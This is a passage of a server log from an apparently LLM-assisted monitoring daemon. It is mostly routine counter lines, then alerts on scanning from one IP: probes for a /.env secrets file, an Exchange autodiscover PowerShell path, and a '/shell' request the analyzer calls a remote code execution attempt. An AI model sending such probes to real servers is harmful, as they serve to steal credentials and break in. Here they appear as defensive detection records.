2026/03/20 11:57:31.934137 [observer] Patterns: hash=4688 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:58:01.958641 [observer] Pipeline: processed=4796 pattern_hits=4690 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:58:01.958671 [observer] Patterns: hash=4690 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:58:31.941022 
[observer] Pipeline: processed=4800 pattern_hits=4694 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:58:31.941055 [observer] Patterns: hash=4694 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:59:01.948577 [observer] Pipeline: processed=4802 pattern_hits=4696 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:59:01.948604 [observer] Patterns: hash=4696 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 11:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:59:31.935464 [observer] Pipeline: processed=4806 pattern_hits=4700 llm_calls=106 llm_errors=1 learned=3 Mar 20 11:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:59:31.935489 [observer] Patterns: hash=4700 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:00:01.952406 [observer] Pipeline: processed=4810 pattern_hits=4704 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:00:01.952446 [observer] Patterns: hash=4704 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:00:31.950483 [observer] Pipeline: processed=4812 pattern_hits=4706 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:00:31.950511 [observer] Patterns: hash=4706 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:01:01.951829 [observer] Pipeline: processed=4816 pattern_hits=4710 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:01:01.951858 [observer] Patterns: hash=4710 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 
misses=106 Mar 20 12:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:01:31.949338 [observer] Pipeline: processed=4818 pattern_hits=4712 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:01:31.949361 [observer] Patterns: hash=4712 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:02:01.949598 [observer] Pipeline: processed=4822 pattern_hits=4716 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:02:01.949629 [observer] Patterns: hash=4716 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:02:31.934298 [observer] Pipeline: processed=4824 pattern_hits=4718 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:02:31.934320 [observer] Patterns: hash=4718 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:03:01.957189 [observer] Pipeline: processed=4828 pattern_hits=4722 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:03:01.957229 [observer] Patterns: hash=4722 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:03:31.940782 [observer] Pipeline: processed=4830 pattern_hits=4724 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:03:31.940829 [observer] Patterns: hash=4724 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:04:01.952220 [observer] Pipeline: processed=4832 pattern_hits=4726 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:04:01.953435 
[observer] Patterns: hash=4726 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:04:31.941660 [observer] Pipeline: processed=4836 pattern_hits=4730 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:04:31.941695 [observer] Patterns: hash=4730 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:05:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:05:02.091763 [observer] Pipeline: processed=4838 pattern_hits=4732 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:05:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:05:02.108828 [observer] Patterns: hash=4732 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:05:31.936450 [observer] Pipeline: processed=4845 pattern_hits=4739 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:05:31.936474 [observer] Patterns: hash=4739 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:06:01.950847 [observer] Pipeline: processed=4847 pattern_hits=4741 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:06:01.950879 [observer] Patterns: hash=4741 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:06:31.934221 [observer] Pipeline: processed=4851 pattern_hits=4745 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:06:31.934242 [observer] Patterns: hash=4745 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:07:01.970531 [observer] Pipeline: processed=4853 pattern_hits=4747 llm_calls=106 llm_errors=1 
learned=3 Mar 20 12:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:07:01.970574 [observer] Patterns: hash=4747 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:07:31.943833 [observer] Pipeline: processed=4855 pattern_hits=4749 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:07:31.943859 [observer] Patterns: hash=4749 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:08:01.949767 [observer] Pipeline: processed=4859 pattern_hits=4753 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:08:01.949807 [observer] Patterns: hash=4753 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:08:31.950968 [observer] Pipeline: processed=4861 pattern_hits=4755 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:08:31.950995 [observer] Patterns: hash=4755 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:09:01.946715 [observer] Pipeline: processed=4865 pattern_hits=4759 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:09:01.946744 [observer] Patterns: hash=4759 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:09:31.937647 [observer] Pipeline: processed=4867 pattern_hits=4761 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:09:31.937673 [observer] Patterns: hash=4761 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 
12:10:01.936928 [observer] Pipeline: processed=4871 pattern_hits=4765 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:10:01.936957 [observer] Patterns: hash=4765 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:10:31.943352 [observer] Pipeline: processed=4875 pattern_hits=4769 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:10:31.943383 [observer] Patterns: hash=4769 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:11:01.960228 [observer] Pipeline: processed=4877 pattern_hits=4771 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:11:01.960250 [observer] Patterns: hash=4771 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:11:31.940741 [observer] Pipeline: processed=4881 pattern_hits=4775 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:11:31.940768 [observer] Patterns: hash=4775 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:12:01.957063 [observer] Pipeline: processed=4883 pattern_hits=4777 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:12:01.957120 [observer] Patterns: hash=4777 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:12:31.936430 [observer] Pipeline: processed=4887 pattern_hits=4781 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:12:31.936464 [observer] Patterns: hash=4781 prefix=0 regex=0 contains=0 deny=21 
alert=303 suppress=0 misses=106 Mar 20 12:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:13:01.946357 [observer] Pipeline: processed=4889 pattern_hits=4783 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:13:01.946386 [observer] Patterns: hash=4783 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:13:31.935895 [observer] Pipeline: processed=4893 pattern_hits=4787 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:13:31.935920 [observer] Patterns: hash=4787 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:14:01.959270 [observer] Pipeline: processed=4895 pattern_hits=4789 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:14:01.959311 [observer] Patterns: hash=4789 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:14:31.950751 [observer] Pipeline: processed=4897 pattern_hits=4791 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:14:31.950783 [observer] Patterns: hash=4791 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:15:01.945619 [observer] Pipeline: processed=4901 pattern_hits=4795 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:15:01.945678 [observer] Patterns: hash=4795 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:15:31.944722 [observer] Pipeline: processed=4905 pattern_hits=4799 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:15:31 ip-172-26-12-110 observer[1565011]: 
2026/03/20 12:15:31.944753 [observer] Patterns: hash=4799 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:16:01.951375 [observer] Pipeline: processed=4909 pattern_hits=4803 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:16:01.951480 [observer] Patterns: hash=4803 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:16:31.936358 [observer] Pipeline: processed=4911 pattern_hits=4805 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:16:31.936379 [observer] Patterns: hash=4805 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:17:01.943674 [observer] Pipeline: processed=4915 pattern_hits=4809 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:17:01.943705 [observer] Patterns: hash=4809 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:17:31.939381 [observer] Pipeline: processed=4917 pattern_hits=4811 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:17:31.939415 [observer] Patterns: hash=4811 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:18:01.958420 [observer] Pipeline: processed=4919 pattern_hits=4813 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:18:01.958484 [observer] Patterns: hash=4813 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:18:31.938724 [observer] Pipeline: processed=4923 pattern_hits=4817 
llm_calls=106 llm_errors=1 learned=3 Mar 20 12:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:18:31.938754 [observer] Patterns: hash=4817 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:19:01.954834 [observer] Pipeline: processed=4925 pattern_hits=4819 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:19:01.954862 [observer] Patterns: hash=4819 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:19:31.935554 [observer] Pipeline: processed=4929 pattern_hits=4823 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:19:31.935579 [observer] Patterns: hash=4823 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:20:01.958642 [observer] Pipeline: processed=4931 pattern_hits=4825 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:20:01.958682 [observer] Patterns: hash=4825 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:20:31.934332 [observer] Pipeline: processed=4937 pattern_hits=4831 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:20:31.934359 [observer] Patterns: hash=4831 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:21:01.958128 [observer] Pipeline: processed=4939 pattern_hits=4833 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:21:01.959363 [observer] Patterns: hash=4833 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:21:31 ip-172-26-12-110 
observer[1565011]: 2026/03/20 12:21:31.954508 [observer] Pipeline: processed=4941 pattern_hits=4835 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:21:31.954536 [observer] Patterns: hash=4835 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:22:01.949606 [observer] Pipeline: processed=4945 pattern_hits=4839 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:22:01.949678 [observer] Patterns: hash=4839 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:22:31.950783 [observer] Pipeline: processed=4947 pattern_hits=4841 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:22:31.950814 [observer] Patterns: hash=4841 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:23:01.976299 [observer] Pipeline: processed=4951 pattern_hits=4845 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:23:01.976339 [observer] Patterns: hash=4845 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:23:31.935338 [observer] Pipeline: processed=4953 pattern_hits=4847 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:23:31.935366 [observer] Patterns: hash=4847 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:24:01.945577 [observer] Pipeline: processed=4957 pattern_hits=4851 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:24:01.945693 [observer] Patterns: hash=4851 prefix=0 
regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:24:31.935565 [observer] Pipeline: processed=4959 pattern_hits=4853 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:24:31.935593 [observer] Patterns: hash=4853 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:25:01.970105 [observer] Pipeline: processed=4962 pattern_hits=4856 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:25:01.970137 [observer] Patterns: hash=4856 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:25:31.935820 [observer] Pipeline: processed=4968 pattern_hits=4862 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:25:31.935844 [observer] Patterns: hash=4862 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106 Mar 20 12:25:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:25:41.168679 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file (.env) via HTTP, which is a common probe for exposed configuration data. Line=2026-03-20T12:25:41.168359479Z 2026/03/20 12:25:41 [error] 422#422: *749767 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 193.239.176.135, server: _, request: "... Mar 20 12:25:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:25:41.168769 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). 
Line=2026-03-20T12:25:41.168549666Z 193.239.176.135 - - [20/Mar/2026:12:25:41 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, l... Mar 20 12:25:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:25:42.306474 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T12:25:42.306182538Z 193.239.176.135 - - [20/Mar/2026:12:25:42 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like ... Mar 20 12:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:26:01.983043 [observer] Pipeline: processed=4973 pattern_hits=4867 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:26:01.983083 [observer] Patterns: hash=4867 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106 Mar 20 12:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:26:31.935547 [observer] Pipeline: processed=4977 pattern_hits=4871 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:26:31.935572 [observer] Patterns: hash=4871 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106 Mar 20 12:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:27:01.967699 [observer] Pipeline: processed=4979 pattern_hits=4873 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:27:01.967736 [observer] Patterns: hash=4873 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106 Mar 20 12:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:27:31.935233 [observer] Pipeline: processed=4983 pattern_hits=4877 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:27:31 ip-172-26-12-110 observer[1565011]: 
2026/03/20 12:27:31.935282 [observer] Patterns: hash=4877 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106 Mar 20 12:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:28:01.946200 [observer] Pipeline: processed=4985 pattern_hits=4879 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:28:01.946226 [observer] Patterns: hash=4879 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106 Mar 20 12:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:28:31.944317 [observer] Pipeline: processed=4987 pattern_hits=4881 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:28:31.944341 [observer] Patterns: hash=4881 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106 Mar 20 12:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:29:01.946512 [observer] Pipeline: processed=4991 pattern_hits=4885 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:29:01.946548 [observer] Patterns: hash=4885 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106 Mar 20 12:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:29:31.935835 [observer] Pipeline: processed=4993 pattern_hits=4887 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:29:31.935869 [observer] Patterns: hash=4887 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106 Mar 20 12:30:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:30:02.010021 [observer] Pipeline: processed=4997 pattern_hits=4891 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:30:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:30:02.010054 [observer] Patterns: hash=4891 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106 Mar 20 12:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:30:31.934206 [observer] Pipeline: processed=4999 pattern_hits=4893 
llm_calls=106 llm_errors=1 learned=3 Mar 20 12:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:30:31.934229 [observer] Patterns: hash=4893 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106 Mar 20 12:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:01.949743 [observer] Pipeline: processed=5005 pattern_hits=4899 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:01.949775 [observer] Patterns: hash=4899 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106 Mar 20 12:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:31.943600 [observer] Pipeline: processed=5007 pattern_hits=4901 llm_calls=106 llm_errors=1 learned=3 Mar 20 12:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:31.943629 [observer] Patterns: hash=4901 prefix=0 regex=0 contains=0 deny=22 alert=305 suppress=0 misses=106 Mar 20 12:31:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:47.202085 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 20 12:31:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:47.202127 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+) Mar 20 12:31:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:59.662347 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=malicious confidence=0.92 action=deny pattern_type= Mar 20 12:31:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:59.662384 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Detected an open() failure on a suspicious path with a crafted request containing shell commands, indicating an attempted remote code execution or path traversal attack Line=2026-03-20T12:31:54.174360735Z 2026/03/20 12:31:54 [error] 422#422: *749828 open() "/usr/share/nginx/default/shell" failed (2: No such file or directory), client: 
